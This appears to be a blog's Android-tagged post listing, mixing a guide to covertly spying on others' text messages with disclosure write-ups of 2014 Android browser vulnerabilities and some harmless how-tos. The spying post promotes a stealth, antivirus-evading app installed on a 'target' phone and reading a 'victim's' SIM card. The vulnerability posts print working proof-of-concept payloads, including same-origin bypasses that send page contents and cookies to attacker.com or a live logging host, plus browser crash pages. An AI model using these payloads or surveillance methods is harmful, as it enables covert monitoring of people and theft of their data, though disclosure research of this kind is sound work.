Latest News

Showing posts with label android. Show all posts
Showing posts with label android. Show all posts

How to Spy on Text Messages

It seems that in recent years most of society, especially the younger generations, have turned to texting as their preferred mode of conversation. The infinite ability to communicate with other people around the world effortlessly has become a growing concern for parents and employers alike who wish to 'keep an eye on', or monitor, their children or employees. In this post we will discuss the methods and implications of text message spying.

Methods To Spy On Text Messages

There are several methods to spy on text messages, however we would only discuss the following two methods which happen to be easy for parents/employeers to monitor their children/employees  activities.

Method 1: Using a Spying App

The easiest way to spy on text messages is to use one of spying application. Today there exist literally hundred's of products claiming to spy on text messages, however most of them are overpriced or they are not compatible with wide variety of smartphones. With that being said, there are still very few spying softwares that stand out to competition and one of my favorite is mspy.

mspy posses state of art stealth capabilities to spy on various text messaging applications such as Whatsapp, Viber, Facebok Messenger, LINE so on and so forth. Apart from that you can also monitor call logs and track location of smartphone (Absolutely must have for Parents).  The best part being that you don't have to jailbreak your iOS device or root your android device in order to install it.

How it works?

Upon placing and order for mspy, you would receive an application that you have to install on target's phone by simply launching the browser from the target phone, typing the URL and downloading and executing the application. Once you have successfully installed it, it would send alerts to your control panel or account which would be created once you have signed up. In case of any issue you can simply contact their 24/7 support team.

                                                             

Features

  • Monitor call logs, SMS and Contacts 
  • Spy on Internet activity including social media like Facebook, Twitter and Gmail.
  • It is not detected by antiviruses and operates in complete stealth mode,.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  •  Track GPS locations in real-time.
  •  Spy on all multimedia content stored on a device. Monitor what childrens are storing on their devices. 
  • 24/7 live support.

Compatibility

  • iPhone/iPad (iOS 6 – 8.3)
  • Android Phones (Version 4+)
Disclaimer: SOFTWARE INTENDED FOR LEGAL USES ONLY. It is the violation of the United States federal and/or state law and your local jurisdiction law to install surveillance software, such as the Licensed Software, onto a mobile phone or other device you do not have the right to monitor. RHA shall not be responsible for any misuse of this product.

Method 2: Using SIM Card Reader To Recover Messages

In case, if you can't afford an spying app, you could look for free alternatives, however there are few drawbacks to it. One being that a lot of them found on forums are backdoored, also they require good amount of technical knowledge to setup and operate. Another way is to buy a SIM card reader from market and use victim's SIM card to recover messages or phone contacts stored on it.

Requirements

  • PC/SC compliant smart card reader
Note: Some phones tend to keep messages inside their internal memory, in that case you have to move messages from internal memory to SIM card. 

Step 1: Download "Dekart SIM Manager"from here.


Step 2: Once the sim card has been plugged into the SIM card reader and the card reader has been connected to your computer. Press the"READ" button to read the messages, GSM contacts, last dialed numbers etc. 


Step  3 -> Since, our aim here is to recover deleted messages, we would go to the "SMS messages" tab. To recover a message right click on a message and select "Undelete" option.  Once this is done, press the "Write" button to write it on the sim card. 

Note: The messages marked in "RED" are deleted messages where as the messages marked in black are the ones which are still available on the sim card.  

Ref:https://www.dekart.com/fileadmin/howto/Howto-recover-deleted-SMS/SIM-Manager-undelete-SMS.png

Note: Please note that this method can only be used to recover SMS messages that are stored on the SIM not Whatsapp, Viber etc messages. To overcome this, I would suggest you to use method 1. 

Android Browser Kitkat Content Spoofing Vulnerability


The following is a low risk vulnerability that was found few months ago while testing the latest Android Stock browser on Android Kitkat.  The issue that was found is commonly referred as Content spoofing Vulnerability or dialog box spoofing vulnerability which could be used to fake an alert message on a legitimate website.

In other words, i could display an alert box (Of my choice) on the site of my choice. Whereas in chrome, Firefox and other browser the alert box appears on correct tab. 

POC

<a onclick="test()">CLICK</a> 
<script> function test()
{ window.open('http://bing.com/') setTimeout (function(){alert("HACKED");}, 5000) } 
</script>

Upon executing the above code, the alert box would be displayed on bing.com. 




Technical Details

The issue resides inside of the ASOP browser, and more specifically due to the fact the webview fails to overwrite the WebChromeClient.onJsAlert() method which is responsible for displaying the javascript alert box and this way webview is not able to switch the JsAlert() to the correct tab.

Future Releases

I have recently reported another medium risk issue present in latest android stock browser, which would be released once the issue is addressed by the Google team. 

A Tale Of Another SOP Bypass In Android Browser < 4.4


Since, my recent android SOP bypass [CVE-2014-6041] triggered a lot of eruption among the infosec community, I was motivated to research a bit more upon the android browser, it turns out that things are much worse than I thought, I managed to trigger quite a few interesting vulnerabilities inside of Android browser, one of them being another Same Origin Policy Bypass vulnerability. The thing that makes it worse was the same SOP bypass was already fixed inside of chrome years ago, however the patches were not applied to Android browser < 4.4.

Proof Of Concept

The following is the proof of concept:

<script>
window.onload = function()
{
    object = document.createElement("object");
    object.setAttribute("data", "http://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
      object.setAttribute("data", "javascript:alert(document.domain)");
        object.innerHTML = "foobar";
    }
}
</script>


The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "http://www.bing.com", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work object.innerHTML = "foobar"; so that the navigation request is performed

Let's take a look at the vulnerable code that is responsible for the causing the issue:

Vulnerable Code

bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
{
    ASSERT(document());
    ASSERT(document()->frame());
    if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
        return false;
    KURL completeURL = document()->completeURL(url);


The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.

The fix

The issue was fixed by applying the following checks from securityorigin.h library.

  if (contentFrame() && protocolIsJavaScript(completeURL)
       && !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))
       return false;

Proof Of Concept Using Postmessage Call

To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.

<script>
window.onload = function()
{
    object = document.createElement("object");
    object.setAttribute("data", "http://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
        object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";
        object.innerHTML = "foobar";
    }
}

window.onmessage = function(m){
  alert(m.data);
}
</script>

Proof Of Concept To Steal Data Across Domains

A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.

<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";
object.innerHTML = "foobar";
}
}

The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.

file_put_contents('record.txt', $_POST['content']);

The following are some of the handsets that we used to test and verify this vulnerability.

Sony Xperia



LGNexus4







Samsung Galaxy S3





Safari Browser 5.0



Google's Response

The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released here.

In Closing

There are tons of other browsers with huge userbase that are vulnerable to same vulnerability, Maxthon, CM Browser, Safari Browser 5.0 to name a few. In case if you are still using Android browser or any of other browser, you should immediately apply patches or switch to Chrome or firefox. I believe there are several other vulnerabilities that were addresses in chrome webkit and still have not been addressed inside of Android browser, therefore it is recommended to avoid it completely.


Press Coverage

http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html

http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/

http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser

http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser

http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html

http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html

http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/

https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/

http://www.net-security.org/secworld.php?id=17459

http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/

http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1

http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all

http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/

http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/

Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041

Introduction

Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another.

SOP Bypass

A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser.

Update: Other folks have verified this issue to work under Android browser < 4.4. Ref - https://github.com/rapid7/metasploit-framework/pull/3759

The following is a proof of concept:

Proof Of Concept 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.

However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.

I created the following POC, so you can mess around with some stuff:

Reading the response

You can read the response of any page by accessing the document.body.innerHTML property.

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >

Reading the response and sending it to an attackers domain

In real world situation an attacker would send the response to his controlled domain. 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Bypassing Frame Busting Code

A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.

<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Update: A metasploit module has been released by jvennix-r7 which also supports x-frame-options bypass making it a completely universal exploit.  Ref - https://github.com/rapid7/metasploit-framework/pull/3759

Affected Versions

The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.

The following are some of the smartphones i tested with browserstack.com.

Samsung Galaxy S3


Motrorolla Razr




Sony Xperia Tipo



HTC Evo 3D and Wildfire 


Hope you enjoyed it, Until next time. Pass the comments.

Updates

Press Coverage

http://threatpost.com/flaw-in-android-browser-allows-same-origina-policy-bypass/108265#comment-317786

https://showyou.com/v/y-yY23sS6DoEs/android-browser-vulnerability-security-now-473

 https://securitystreet.jive-mobile.com/#jive-document?content=%2Fapi%2Fcore%2Fv2%2Fposts%2F6804

 http://www.theregister.co.uk/2014/09/16/three_quarters_of_droid_phones_open_to_web_page_spy_bug/

http://linustechtips.com/main/topic/216087-metasploit-major-android-bug-is-a-privacy-disaster-cve-2014-6041/

http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/

http://www.forbes.com/sites/thomasbrewster/2014/09/16/widespread-android-vulnerability-a-privacy-disaster-claim-researchers/

http://www.securityweek.com/dangerous-same-origin-policy-bypass-flaw-found-android-browser

http://www.computerworld.com/article/2684059/many-android-devices-vulnerable-to-session-hijacking-through-the-default-browser.html

http://gadgets.ndtv.com/mobiles/news/android-browser-security-hole-affects-millions-of-users-says-expert-592578

http://www.bostonglobe.com/business/2014/09/15/rapid-boston-finds-android-flaw/JJ9iHJB6YTcs10a7O9TjpN/story.html

http://www.digit.in/mobile-phones/android-security-flaw-affects-millions-of-users-23921.html

http://www.phonearena.com/news/New-Android-bug-called-a-privacy-disaster_id60750

http://www.scmagazine.com/android-bug-allowing-sop-bypass-a-privacy-disaster-researcher-warns/article/371917/

http://arstechnica.com/security/2014/09/android-browser-flaw-a-privacy-disaster-for-half-of-android-users/

http://thehackernews.com/2014/09/new-android-browser-vulnerability-is.html

http://xakep.ru/news/aosp-browser-sop/

http://blog.trendmicro.com/trendlabs-security-intelligence/same-origin-policy-bypass-vulnerability-has-wider-reach-than-thought/

http://daily.urdupoint.com/livenews/2014-09-17/news-303641.html

http://dailypakistan.com.pk/daily-bites/17-Sep-2014/144263

http://e.jang.com.pk/09-24-2014/karachi/page16.asp

http://tribune.com.pk/story/764713/online-security-pakistani-helps-google-avoid-privacy-disaster/

http://www.dawn.com/news/1133178/pakistani-researcher-reveals-privacy-flaw-in-android-browsers

http://tribune.com.pk/story/764925/credit-to-our-white-hats/

http://propakistani.pk/2014/09/23/pakistani-researcher-helps-google-preventing-massive-security-disaster/

http://www.makeuseof.com/tag/this-android-browser-bug-will-make-you-upgrade-to-kitkat/

Android Browser + Messaging App DOS


While being impressed by Collin Mulliner's research on smart phones, I found myself very curious trying to find vulnerabilities inside it and i found several ones out. In this short blog post I would be discussing about DOS vulnerabilities inside the default browser and the messaging app of Qmobile Noir A20. Qmobile Noir A20 runs on Android 4.1.2. The flaw itself is present it inside pre kitkat browsers as well as the default messaging system, however since most of the Qmobile smartphones within the released with or slightly after Noir A20 are most likely using the same browser version and messaging app.

Android Browser DOS

The vulnerability is a simply Denial of service issue due to the writing overly long strings of iframes to the DOM.

Here is the POC:

<html>
<head>
<title>Android Browser DOS</title>
 <body>
 <script>
  frame = "<iframe src=\"test:";
  for (i = 0; i < 100000; i++) {
      frame = frame + "0000000000000000000000000000000000"; // Long string of Numbers  }
 frame = frame + "\" width=125 height=125></iframe>"; // Appending the resultant of the loop to closing tag.  document.write(frame); // Writing the value of frame to DOM
  </script>
  </body>
  </html>

Messaging App DOS

A sms protocol provides text messaging component for all smartphones, During my tests, I concluded that the default messaging app for Qmobile Noir A20 is not able to handle long strings sent via sms:// protocol. Please note that this is partly recoverable DOS, and also the exact conditions for DOS are not yet known.

Here is the POC:

  <html>
  <title>Android Browser SMS Protocol Denial Of Service</title>
  <body>
  <script>
  frame = "<iframe src=\"sms:";
  for (i = 0; i < 30000; i++) {
          frame = frame + "+12345678912222222222222";
  }
 frame = frame + "\" </iframe><iframe src='sms:+1234567891212121222222222'></iframe>";
 document.write(frame);
  </script>
  </body>
  </html>

References
  • http://mulliner.org/security/advisories/iphone_safari_phone-auto-dial_vulnerability_advisory.txt
  • https://www.ietf.org/rfc/rfc5724.txt

Unlock/ Reset Android Pattern Lock/Password


Android is a very interesting and very interface and it has become very popular among mobile and gadget users been the operating system use now. The problem users face now is how to disable or unlock android phone password or pattern lock which has become common now. So, If you also forgot your android mobile's password or you have forgot your pattern lock then no need to worry i am going to tell you how can you reset your pattern lock without using gmail or any other things.

Steps:
  1. First you need to switch off your Android device.
  2. After switching off your android device, press your Up volume button + Power button and hold it too along with the volume up button. (Sometime you have to press “Volume up + Home Key + Power Button” So if above key combination will not work for you try this one.)
  3. It will start a secret terminal interface.
  4. Then press to use Home button for scroll up and down.
  5. Then you will get to the choose option DELETE ALL USER DATA.
  6. Select the option and wait
  7. Your device will take some time but after it will restart and you will find out your android device has been unlocked.
Warning - This is the process of getting back the factory setting, in this case may be your mobile data/setting will be reset. Kindly eject your Micro card before trying this. 

Like it ? Share it.

Save Battery Life by Hacking the OLED Display [Android]

Here is a cool hack that will help you save your battery on Android phones like Google Nexus One and Samsung Galaxy that come with OLED display. Darker colors especially red colors on OLED displays consume less power. Here is a video to know how to perform this hack.

NO side effects :P

How to Install Android 4.3 on VMware

Intro - Android is a Linux-based operating system.This open-source code and permissive licensing allows the software to be freely modified and distributed by device manufacturers, wireless carriers and enthusiast developers.

Requirements:-
         1.      Android-x86-4.3.ISO (Download here)
         2.      Any Virtual Machine Software (recommended VM player & VM workstation)



1. Go to file and click on new
                                                                                      (click image for large view)

2. Select typical and click next


3. Select ISO file and click next

4. You can rename your OS and also you can choose where do you want to install your OS means in which drive or directory.

5. Resize your OS installation disk size It should be more than 2 GB for comfort and click on Next

6. Just click on finish

7. After booting your ISO the screen will show like given Image & select Installation

8. Select Create/Modify partitions & click ok

9. Now select New

10. Select Primary

11. Let it be default & press Enter

12. Now select Write & press Enter

13. Type Yes & press Enter

14. Select Quit& press Enter

15. Select sda1 & press Enter

16. Select ext3 & press Enter

17. Select Yes & press Enter

18. Select Yes & press Enter


19. Select Yes & press Enter

20. Select Run Android-x86 & press Enter 

21. It starts Booting (takes some time) as shown in below image

22. Select the language & click Start

23. It takes some time to Load as shown in below image

24. You can select the available Network or just click Skip

25. Select Yesto setup your Account or No to setup later

26. Set the Time& Date. Click Here

27. Provide the User name & Click Here

28. After everything set Desktop screen will appear as shown in below image  

29. These are Default Apps

30. You can check the Android version in Setting→AboutTablet
(click image for large view)

Credits goes to - d00z13

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code